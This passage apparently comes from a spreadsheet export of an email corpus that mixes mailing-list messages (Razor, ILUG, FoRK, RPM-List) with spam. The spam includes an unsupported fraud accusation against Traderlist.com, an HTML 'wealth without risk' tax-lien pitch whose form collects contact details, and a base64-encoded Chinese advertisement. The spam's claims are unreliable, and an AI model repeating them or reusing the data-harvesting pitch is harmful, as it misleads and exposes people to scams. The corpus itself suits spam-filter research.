 &gt; &gt; &gt; explained by incompetence".
 &gt; &gt;
 &gt; &gt;Oh Yeah that sounds a WHOLE lot better... (chuckle).
 &gt; &gt;
 &gt; &gt;--
 &gt; &gt;_________________________________________________
 &gt; &gt;No I Don't Yahoo!
 &gt; &gt;And I'm getting pretty sick of being asked if I do.
 &gt; &gt;_________________________________________________
 &gt; &gt;John Andersen / Juneau Alaska
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;-------------------------------------------------------
 &gt; &gt;This sf.net email is sponsored by: Jabber - The world's fastest growing
 &gt; &gt;real-time communications platform! Don't just IM. Build it in!
 &gt; &gt;http://www.jabber.com/osdn/xim
 &gt; &gt;_______________________________________________
 &gt; &gt;Razor-users mailing list
 &gt; &gt;Razor-users@lists.sourceforge.net
 &gt; &gt;https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;
 &gt; --
 &gt; Christopher VanOosterhout
 &gt; Torresen Marine, Inc.
 &gt; Internet Division
 &gt; http://www.torresen.com/
 &gt; http://www.marinedieseldirect.com/
 &gt; 3126 Lake Shore Drive
 &gt; Muskegon, Michigan 49441
 &gt; 231-759-8596
 &gt;
 &gt;
 &gt;
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: Jabber - The world's fastest growing
 &gt; real-time communications platform! Don't just IM. Build it in!
 &gt; http://www.jabber.com/osdn/xim
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Traderlist.com being shut down due to FRAUD!
</t>
  </si>
  <si>
    <t xml:space="preserve">Traderlist.com is a fraud and is sending out your e-mail to 3rd parties!! 
 With the help of an email extracting program anyone can get your email adress and home adress from scanning Traderlist.com.
 Traderlist.com is breach the Internet Privacy Act by adding your email adress and adress without the consent of the owner.
 We are working towards a class action law suit which will see Traderlist.com ordered to be shut down and pay a fine.
 If you are interested and would like to find out how Traderlist.com sends out your email and other personal information to 3rd parties just reply to this message.
 Regards,
 Jean McCart
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Horror writers against illiteracy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85485985
 Date: Not supplied
 The Horror Writers of America are hosting a charity auction on eBay to raise 
 money for American literacy charities. 
     Among the items up for auction: a rare softcover advance copy (bound 
     galley) of Thomas Harris' The Silence of the Lambs issued by St. Martin's 
     Press in 1988; the first U.S. hardcover edition of Clive Barker's The 
     Damnation Game; and a bundle of limited-edition prints depicting scenes 
     from Stephen King novels such as Carrie and The Shining.  
 Link[1] Discuss[2]
 [1] http://www.wired.com/news/culture/0,1284,55319,00.html
 [2] http://www.quicktopic.com/boing/H/qWd2YRCqaFUqW
</t>
  </si>
  <si>
    <t xml:space="preserve">First, misattribution.  I did not write the blurb below.  I made one
 statement about VP Cheney only, to wit, that he has a short memory.
 I couldn't agree with you more on this: "in short, then, economics is not a
 zero sum game, property is not theft, the rich don't get rich off the backs
 of the poor, and redistributionist labor "theory" of value happy horseshit
 is just that: horseshit, happy or otherwise," however, I resent being lumped
 in a zero-sum-zealot category for suggesting nothing more than that rich and
 successful at face value is apropos of nothing and I am beginning to
 understand that people who immediately and so fiercely object to my ad
 hominem (re Cheney) align themselves weird sylogisms like "if rich then
 deservedly" or "if rich then smarter."  Given that, I am also beginning to
 understand why some people NEED to be rich.
 WRT to meritocracies - all hail, meritocracies!  WRT Harvard: over 90% of
 2002 graduates were cum laude +. INTERESTING curve.  Those eager to be
 measured got their wish; those unwashed shy folk who just live it provide
 the balast.
 Speaking of Forbes, was reading about Peter Norton just today in an old
 issue while waiting for my doctor.  Norton attributes his success to LUCK.
 Imagine.
 Geege
 -----Original Message-----
 From: R. A. Hettinga [mailto:rah@shipwright.com]
 Sent: Sunday, September 22, 2002 10:01 PM
 To: Geege Schuman; Owen Byrne
 Cc: Gary Lawrence Murphy; Mr. FoRK; fork@spamassassin.taint.org; Digital Bearer
 Settlement List
 Subject: Comrade Communism (was Re: Crony Capitalism (was RE: sed
 /s/United States/Roman Empire/g))
 -----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
 &gt; Most of them seem to have Ivy League educations, or are Ivy League
 &gt; dropouts suggesting to me that they weren't exactly poor to start
 &gt; with.
 Actually, if I remember correctly from discussion of the list's
 composition in Forbes about five or six years ago, the *best* way to
 get on the Forbes 400 is to have *no* college at all. Can you say
 "Bootstraps", boys and girls? I knew you could...
 [Given that an undergraduate liberal arts degree from a state school,
 like, say, mine, :-), is nothing but stuff they should have taught
 you in a government-run "high" school, you'll probably get more of
 *those* on the Forbes 400 as well as time goes on. If we ever get
 around to having a good old fashioned government-collapsing
 transfer-payment depression (an economic version of this summer's
 government-forest conflagration, caused by the same kind of
 innumeracy that not clear-cutting enough forests did out west this
 summer :-)) that should motivate more than a few erst-slackers out
 there, including me, :-), to learn to actually feed themselves.]
 The *next* category on the Forbes 400 list is someone with a
 "terminal" professional degree, like an MBA, PhD, MD, etc., from the
 best school possible.
 Why? Because, as of about 1950, the *best* way to get into Harvard,
 for instance, is to be *smart*, not rich. Don't take my word for it,
 ask their admissions office. Look at the admissions stats over the
 years for proof.
 Meritocracy, American Style, was *invented* at the Ivy League after
 World War II. Even Stanford got the hint, :-), and, of course,
 Chicago taught them all how, right? :-). Practically *nobody* who
 goes to a top-20 American institution of higher learning can actually
 afford to go there these days. Unless, of course, their parents, who
 couldn't afford to go there themselves, got terminal degrees in the
 last 40 years or so. And their kids *still* had to get the grades,
 and "biased" (by intelligence :-)), test scores, to get in.
 The bizarre irony is that almost all of those people with "terminal"
 degrees, until they actually *own* something and *hire* people, or
 learn to *make* something for a living all day on a profit and loss
 basis, persist in the practically insane belief, like life after
 death, that economics is some kind of zero sum game, that dumb people
 who don't work hard for it make all the money, and, if someone *is*
 smart, works hard, and is rich, then they stole their wealth somehow.
 BTW, none of you guys out there holding the short end of this
 rhetorical stick can blame *me* for the fact that I'm using it to
 beat you severely all over your collective head and shoulders. You
 were, apparently, too dumb to grab the right end. *I* went to
 Missouri, and *I* don't have a degree in anything actually useful,
 much less a "terminal" one, which means *I*'m broker than anyone on
 this list -- it's just that *you*, of all people, lots with
 educations far surpassing my own, should just plain know better. The
 facts speak for themselves, if you just open your eyes and *look*.
 There are no epicycles, the universe does not orbit the earth, and
 economics is not a zero-sum game. The cost of anything, including
 ignorance and destitution, is the forgone alternative, in this case,
 intelligence and effort.
 [I will, however, admit to being educated *waay* past my level of
 competence, and, by the way *you* discuss economics, so have you,
 apparently.]
 BTW, if we ever actually *had* free markets in this country,
 *including* the abolition of redistributive income and death taxes,
 all those smart people in the Forbes 400 would have *more* money, and
 there would be *more* self-made people on that list. In addition,
 most of the people who *inherited* money on the list would have
 *much* less of it, not even relatively speaking. Finally, practically
 all of that "new" money would have come from economic efficiency and
 not "stolen" from someone else, investment bubbles or not.
 That efficiency is called "progress", for those of you in The
 People's Republics of Berkeley or Cambridge. It means more and better
 stuff, cheaper, over time -- a terrible, petit-bourgeois concept
 apparently not worthy of teaching by the educational elite, or you'd
 know about it by now. In economic terms, it's also called an increase
 in general welfare, and, no, Virginia, I'm not talking about
 extorting money from someone who works, and giving it to someone who
 doesn't in order to keep them from working and they can think of some
 politician as Santa Claus come election time...
 In short, then, economics is not a zero sum game, property is not
 theft, the rich don't get rich off the backs of the poor, and
 redistributionist labor "theory" of value happy horseshit is just
 that: horseshit, happy or otherwise.
 To believe otherwise, is -- quite literally, given the time Marx
 wrote Capital and the Manifesto -- romantic nonsense.
 Cheers,
 RAH
 -----BEGIN PGP SIGNATURE-----
 Version: PGP 7.5
 iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
 YYboc+IcylP5TlKL58jpwEfu
 =z877
 -----END PGP SIGNATURE-----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</si>
  <si>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Xine dependencies
</t>
  </si>
  <si>
    <t xml:space="preserve">On a RH 8 box, I'm trying to install your package
 xine-0.9.13-fr5.i386.rpm, I keep running into dependency problems.  I've
 tried to install the dev and lib rpm's as well and they error out with
 dependency problems on each other (they each want something from the
 other's package).
 I've tried the --without options, but still end up with (similar for the
 regular package),
 	glut is needed by xine-libs-0.9.13-fr5
         aalib is needed by xine-libs-0.9.13-fr5
         lirc is needed by xine-libs-0.9.13-fr5
         libaa.so.1 is needed by xine-libs-0.9.13-fr5
         libglut.so.3 is needed by xine-libs-0.9.13-fr5
 What am I missing here?
 Thanks for your efforts.
 QuaffAPint
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: GOV'T GUARANTEED HOME BUSINESS
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HR&gt;
 &lt;html&gt;
 &lt;head&gt;
   &lt;title&gt;Secured Investements
   &lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;&lt;font face="Times, New Roman"&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;table width="625" border=0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align="center"&gt;&lt;b&gt;&lt;font color=green
 size=7&gt;WEALTH WITHOUT RISK!!!
 &lt;/font&gt;&lt;/center&gt;&lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;table width="625" border=0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
 &lt;td align="center"&gt;&lt;b&gt;&lt;font color=black
 size=5&gt;Discover The Best Kept Secret In America!
 &lt;/font&gt;&lt;/center&gt;&lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;
 &lt;TABLE align=center border=1 borderColor=#006600
 cellPadding=0 cellSpacing=0 width=515&gt;
 &lt;TBODY&gt;
 &lt;TR bgColor=#ccffcc&gt;
 &lt;TD&gt;
 &lt;P&gt;&lt;FONT color=#99ff00&gt;&lt;B&gt;&lt;FONT color=#339900
 face="Verdana, Arial, Helvetica, sans-serif"
 size=2&gt;Turning $300 Into $20,000
 &lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT color=#003300 face="Verdana, Arial,
 Helvetica, sans-serif" size=2&gt;In Oklahoma, Craig
 Talkington purchased a Tax Lien on a 5 acre parcel for
 $300. The owner failed to pay the taxes and forfeited
 the 5-acre parcel to Craig Talkington. A short time
 later Craig sold that property to one of the neighbors
 for $20,000. That's the kind of money that buys new
 cars and sends young people to college. Craig didn't
 stop at one deal. He later bought a tax lien for only
 $17 on a ten acre track, the property owner failed to
 pay the taxes, and Craig ended up the property, which
 he sold for $4,000. I don't know how much money you
 are making right now but these are the kinds of
 profits that change peoples lives and solve financial
 problems and make things a lot better.
 &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;table width="625" border=0&gt;
   &lt;tbody&gt;
 &lt;TR&gt;
     &lt;td align="center"&gt;&lt;b&gt;&lt;font color=#000033
 size=5&gt;Janice Knetzger Turned A $463.00 Investment Into $65,000.00!&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
   &lt;font color=green size=5&gt;&lt;b&gt;&lt;/b&gt;Wayne Robertson Paid $1.00 For A Home!
 &lt;/B&gt;&lt;/font&gt;&lt;br&gt;  &lt;font color=#ff0000 size=5&gt;&lt;b&gt;&lt;/b&gt;Todd Beemer Turned A $21,500 Investment Into $150,000.00!
   &lt;/font&gt;&lt;/center&gt;&lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width="530" border=0&gt;
   &lt;TBODY&gt;
   &lt;TD align="middle"&gt;&lt;FONT color=#000033
 size=4&gt;&lt;B&gt;For Serious Investors and Entrepreneurs Only&lt;br&gt;&lt;/b&gt;&lt;b&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;/TBODY&gt;&lt;TR&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width="530" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align="middle"&gt;&lt;FONT color=#000033
 size=4&gt;&lt;B&gt;For a &lt;/font&gt;&lt;/b&gt;&lt;FONT color=#ff0000
 size=4&gt;
   &lt;b&gt;FREE&lt;/b&gt;&lt;/font&gt;&lt;FONT color=#000033 size=4&gt;&lt;b&gt;
 Consultantion &lt;/b&gt;&lt;FONT color=#ff0000 size=4&gt;to see if you qualify&lt;/FONT&gt;&lt;br&gt; 
 &lt;/FONT&gt;&lt;/B&gt;&lt;/TBODY&gt;&lt;TR&gt;&lt;/TABLE&gt;
 &lt;br&gt;
 &lt;p align="center"&gt;
 &lt;table width=250 border=0&gt;
   &lt;tbody&gt;
   &lt;tr&gt;
     &lt;td align="center"&gt;&lt;font color=#000033&gt;&lt;b&gt;Fill out
 the &lt;i&gt;no obligation&lt;/i&gt; form below for more
 information.
     &lt;/table&gt;&lt;/tbody&gt;&lt;/tr&gt;&lt;/td&gt;&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P&gt;
 &lt;TABLE width="400" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align="center"&gt;&lt;FONT color=#000033
 size=2&gt;Required Input Field&lt;/font&gt;&lt;font color=#ff0000 
     size=2&gt;*&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE cellSpacing=0 borderColorDark=#333300
 cellPadding=3 width=600 
 borderColorLight=#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align="middle"&gt;
       &lt;FORM
 action=mailto:taxsale06@btamail.net.cn?subject=Investment_Inquiry
 method=post encType=text/plain&gt;
       &lt;TABLE width="100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align="right" width="50%"&gt;&lt;font
 face="Times, New Roman" 
             color=#000033 size=2&gt;NAME&lt;/FONT&gt;
             &lt;FONT color=#ff0000 size=2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
   &lt;TD align="right" width="50%"&gt;&lt;font
 face="Times, New Roman" 
             color=#000033 size=2&gt;ADDRESS&lt;/FONT&gt;
             &lt;FONT color=#ff0000 size=2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=ADDRESS&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align="right" width="50%"&gt;&lt;font
 face="Times, New Roman" 
             color=#000033 size=2&gt;CITY&lt;/FONT&gt;
             &lt;FONT color=#ff0000 size=2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=CITY&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
           &lt;TD align="right" width="50%"&gt;&lt;font
 face="Times, New Roman" 
             color=#000033 size=2&gt;STATE&lt;/FONT&gt;
             &lt;FONT color=#ff0000 size=2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=2 name=STATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
 &lt;TD align="right" width="50%"&gt;&lt;font
 face="Times, New Roman" 
             color=#000033 size=2&gt;PHONE&lt;/FONT&gt;
             &lt;FONT color=#ff0000 size=2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align="right" width="50%"&gt;&lt;font
 face="Times, New Roman" 
             color=#000033 size=2&gt;EMAIL ADDRESS&lt;/FONT&gt;
             &lt;FONT color=#ff0000 size=2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=EMAIL ADDRESS&gt;&lt;/TD&gt;&lt;/TR&gt;      
 &lt;/SELECT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/tbody&gt;&lt;/table&gt;
       &lt;P&gt;&lt;INPUT type=submit value="Submit Information"
 name=submit&gt;
     &lt;/FORM&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;TABLE width=475 border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=middle&gt;&lt;FONT color=000000 size=2&gt;&lt;B&gt;*All
 tax liens and deeds directly support local
       fire departments, police departments, schools,
 roads, and hospitals.  Thank you for your interest and
 support.&lt;/b&gt;&lt;br&gt;
       To be removed, please  
       &lt;A href="mailto:removes@centralmailer.com?subject=Remove_Investment"&gt;click here&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/CENTER&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
 4589dfSl1-151rzeh9359iYoc9-006Fl29
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] 3c509 &amp; 2.4.19 problems - SUMMARY
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; It works fine now that the sound card is removed, but I'm still confused
 &gt; as to
 &gt; why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...
 &gt; 
 &gt; Thanks again,
 &gt; 
 &gt; Cheers,
 &gt; ~Al
 Strange.
 I had the double IRQ problem with the 3c509 combo, 
 and turning pnp off in the card's firware fixed it.
 As far as I remember the problem I was having was 
 that the driver was assigning an IRQ to the card's
  RJ45 port and then another IRQ to it's BNC port,
  and then referenced the card via the second assigned irq,
  and turning off PnP in the card's firmware fixed that.
 You must be having a different error
 Else
 PnP is still turned on.
 &lt;&lt;Obvious suggestion entails&gt;&gt;
 Making sure the IRQ and io space you assign
 the card in it's firmware is not in use by
 any other ISA devices.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?big5?Q?=B4M=A7=E4=BE=F7=B7|?=
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_HAubnVEDr9lCVFKk0
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_HAubnVEDr9lCVFKk0AA"
 ------=_NextPart_HAubnVEDr9lCVFKk0AA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1MYW5ndWFnZSIgY29u
 dGVudD0iemgtdHciPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0
 ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRlbnQ9
 Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVudD0i
 RnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+wLC5TLNcpmikSKRds1ynQaW/u92t
 bjwvdGl0bGU+DQo8L2hlYWQ+DQoNCjxib2R5IGJnY29sb3I9IiNGRjk5MDAiIGJhY2tncm91bmQ9
 ImNpZDouLi9VU0VSL0hPTUVQQUdFL1dHSUYvQkcwMy5HSUYiPg0KDQo8cCBzdHlsZT0ibWFyZ2lu
 LXRvcDogMDsgbWFyZ2luLWJvdHRvbTogMCI+PGZvbnQgY29sb3I9IiMwMDAwRkYiPrNvrE+pZbBV
 pdGxTbd+vHOnaaS9pXGlTrVvpMWqvbG1pl6rSLVMqmuxtaasICAgICANCsvnIH4gITwvZm9udD48
 L3A+ICAgIA0KDQo8aHIgc2l6ZT0iMSI+DQo8ZGl2IGFsaWduPSJjZW50ZXIiPg0KICA8Y2VudGVy
 Pg0KICA8dGFibGUgYm9yZGVyPSIwIiB3aWR0aD0iNjA2IiBoZWlnaHQ9IjM2NSIgY2VsbHNwYWNp
 bmc9IjAiIGNlbGxwYWRkaW5nPSIwIiBzdHlsZT0iYm9yZGVyOiAyIGRvdHRlZCAjRkY5OTMzIj4N
 CiAgICA8dHI+DQogICAgICA8dGQgd2lkdGg9IjYwMCIgaGVpZ2h0PSIzNjUiIHZhbGlnbj0ibWlk
 ZGxlIiBhbGlnbj0iY2VudGVyIiBiZ2NvbG9yPSIjMDBDQzAwIj4NCiAgICAgICAgPHAgYWxpZ249
 ImxlZnQiPjxmb250IGNvbG9yPSIjMDAwMGZmIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsgICANCiAgICAgICAgr9S7fqdBtFis7cTBoUHBQbjRpECt0773t3yhSaFJPC9mb250
 PjwvcD4NCiAgICAgICAgPHAgYWxpZ249ImxlZnQiPjxmb250IGNvbG9yPSIjMDAwMGZmIj4mbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgICANCiAgICAgICAgsnuktarA
 t3ykaq5hs6OmYqfkvve3fKFBpv2+97d8qNOuyadBr3WquqzdqOykRrbcJm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7PC9mb250PjwvcD4NCiAgICAgICAgPHAgYWxpZ249ImxlZnQi
 Pjxmb250IGNvbG9yPSIjMDAwMGZmIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgICANCiAgICAg
 ICAgpFWkQK3Tpb+9VKq6qE2pdzwvZm9udD48YSBocmVmPSJodHRwOi8va2trLmg4aC5jb20udHci
 Pjxmb250IGNvbG9yPSIjZmYwMDAwIj7CSaRVpUw8L2ZvbnQ+PGZvbnQgY29sb3I9IiMwMDAwZmYi
 PqdhPC9mb250PjwvYT48Zm9udCBjb2xvcj0iIzAwMDBmZiI+oUmhSTwvZm9udD48L3A+DQogICAg
 ICAgIDxwIGFsaWduPSJsZWZ0Ij48Zm9udCBjb2xvcj0iI2ZmZmZmZiI+Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 ICAgDQogICAgICAgIKRdvdCxeqtPr2SmuavKRS1tYWlsJm5ic3A7Jm5ic3A7PC9mb250PjwvcD4N
 CiAgICAgICAgPHByZT48Zm9udCBzaXplPSIzIj6kXb3QsXqrT69kprmrykUtbWFpbDwvZm9udD48
 L3ByZT4NCiAgICAgICAgPHByZT48Zm9udCBzaXplPSIzIj4gICAgvdCxerDIpbKs3ae5prk8YSBo
 cmVmPSJodHRwOi8va2trLmg4aC5jb20udHciPr73t3y8dqT5PC9hPqvhpkGnUrCjPC9mb250Pjwv
 cHJlPg0KICAgICAgICA8cD6hQDwvcD4NCiAgICAgICAgPHAgYWxpZ249ImxlZnQiPjxmb250IGNv
 bG9yPSIjMDAwMGZmIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgICAN
 CiAgICAgICAgs8yr4a+ssXqhRzwvZm9udD48L3A+DQogICAgICAgIDxwIGFsaWduPSJsZWZ0Ij48
 Zm9udCBjb2xvcj0iIzAwMDBmZiI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICAgDQogICAgICAg
 IKTft1GoxqaoJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ILhVqMamcLdOPC9m
 b250PjwvcD4gIA0KICAgICAgICA8cD6hQDwvdGQ+DQogICAgPC90cj4NCiAgPC90YWJsZT4NCiAg
 PC9jZW50ZXI+DQo8L2Rpdj4NCjxociBzaXplPSIxIj4NCjxwIGFsaWduPSJjZW50ZXIiIHN0eWxl
 PSJtYXJnaW4tdG9wOiAwOyBtYXJnaW4tYm90dG9tOiAwIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+
 pnCms6W0wlq90KijvcyhQaSjt1GmQaasqOymuatIvdCr9iZuYnNwOyAgICAgDQotJmd0OyZuYnNw
 OyAoPGEgaHJlZj0iaHR0cDovL3gtbWFpbC5oOGguY29tLnR3IiB0YXJnZXQ9Il9ibGFuayI+qdqm
 rLxzp2k8L2E+KTwvZm9udD48L3A+ICAgDQoNCjwvYm9keT4NCg0KPC9odG1sPg==
 ------=_NextPart_HAubnVEDr9lCVFKk0AA--
 ------=_NextPart_HAubnVEDr9lCVFKk0
 Content-Type: image/gif;
 	name="../USER/HOMEPAGE/WGIF/BG03.GIF"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;../USER/HOMEPAGE/WGIF/BG03.GIF&gt;
 R0lGODlhgACAAPcAAP//////////////////////9///9///9///9///7///7///7///7///5///
 5///5///5///3v//3v//3v//3v/37//37//37//37//35//35//35//35//33v/33v/33v/33v/3
 1v/31v/31v/31v/v3v/v3v/v3v/v3v/v1v/v1v/v1v/v1v/vzv/vzv/vzv/vzvf37/f37/f37/f3
 7/f35/f35/f35/f35/f33vf33vf33vf33vfv7/fv7/fv7/fv7/fv5/fv5/fv5/fv5/fv5/fv3vfv
 3vfv3vfv3vfv1vfv1vfv1vfv1vfvzvfvzvfvzvfvzvfn1vfn1vfn1vfn1vfnzvfnzvfnzvfnzvfn
 zu/v3u/v3u/v3u/v3u/v1u/v1u/v1u/v1u/n3u/n3u/n3u/n3u/n1u/n1u/n1u/n1u/nzu/nzu/n
